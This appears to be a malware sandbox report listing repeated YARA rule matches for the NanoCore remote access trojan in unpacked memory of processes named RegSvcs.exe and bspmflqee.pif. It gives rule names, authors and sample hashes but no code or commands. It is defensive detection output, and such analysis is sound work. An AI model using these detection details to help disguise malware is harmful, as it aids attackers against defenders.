        Source: 19.2.RegSvcs.exe.3be560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.3.bspmflqee.pif.3e23078.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.3.bspmflqee.pif.3e23078.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3e23078.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.3.bspmflqee.pif.3e23078.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.3.bspmflqee.pif.3e23078.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3e23078.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.3.bspmflqee.pif.4ab3078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4ab3078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4ab3078.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 5.2.RegSvcs.exe.388df38.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.RegSvcs.exe.388df38.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3dee458.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.3.bspmflqee.pif.3dee458.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3dee458.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.3.bspmflqee.pif.3e8c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.3.bspmflqee.pif.3e8c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3e8c088.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 29.3.bspmflqee.pif.4313078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 29.3.bspmflqee.pif.4313078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.4313078.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.3.bspmflqee.pif.43c7078.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.bspmflqee.pif.43c7078.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.bspmflqee.pif.43c7078.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 22.3.bspmflqee.pif.3e8c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.3.bspmflqee.pif.3e8c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3e8c088.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 29.3.bspmflqee.pif.437c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 29.3.bspmflqee.pif.437c088.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.437c088.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.RegSvcs.exe.3beb041.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.RegSvcs.exe.3beb041.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.bspmflqee.pif.42f5058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.3.bspmflqee.pif.42f5058.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.437c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 29.3.bspmflqee.pif.437c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.3.bspmflqee.pif.42f5058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.3.bspmflqee.pif.4ab3078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4ab3078.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4ab3078.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.437c088.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 12.3.bspmflqee.pif.4a15448.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4a15448.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4a15448.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 5.2.RegSvcs.exe.11a0000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 24.2.RegSvcs.exe.3779650.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.RegSvcs.exe.3779650.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3e23078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.3.bspmflqee.pif.3e23078.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3e23078.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 32.2.RegSvcs.exe.4a107ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 32.2.RegSvcs.exe.4a107ce.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 24.2.RegSvcs.exe.3779650.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.RegSvcs.exe.3779650.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4b1c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.3.bspmflqee.pif.4b1c088.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 12.3.bspmflqee.pif.4b1c088.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 19.2.RegSvcs.exe.2bf9650.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.RegSvcs.exe.2bf9650.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 24.2.RegSvcs.exe.377e6b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.RegSvcs.exe.377e6b0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 5.2.RegSvcs.exe.6440000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.RegSvcs.exe.6440000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3d85448.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 22.3.bspmflqee.pif.3d85448.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 22.3.bspmflqee.pif.3d85448.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 5.2.RegSvcs.exe.3892d98.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 5.2.RegSvcs.exe.3892d98.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 19.2.RegSvcs.exe.2bfe6b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 19.2.RegSvcs.exe.2bfe6b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 24.2.RegSvcs.exe.476b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 24.2.RegSvcs.exe.476b041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.4313078.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 29.3.bspmflqee.pif.4313078.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 29.3.bspmflqee.pif.4313078.7.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
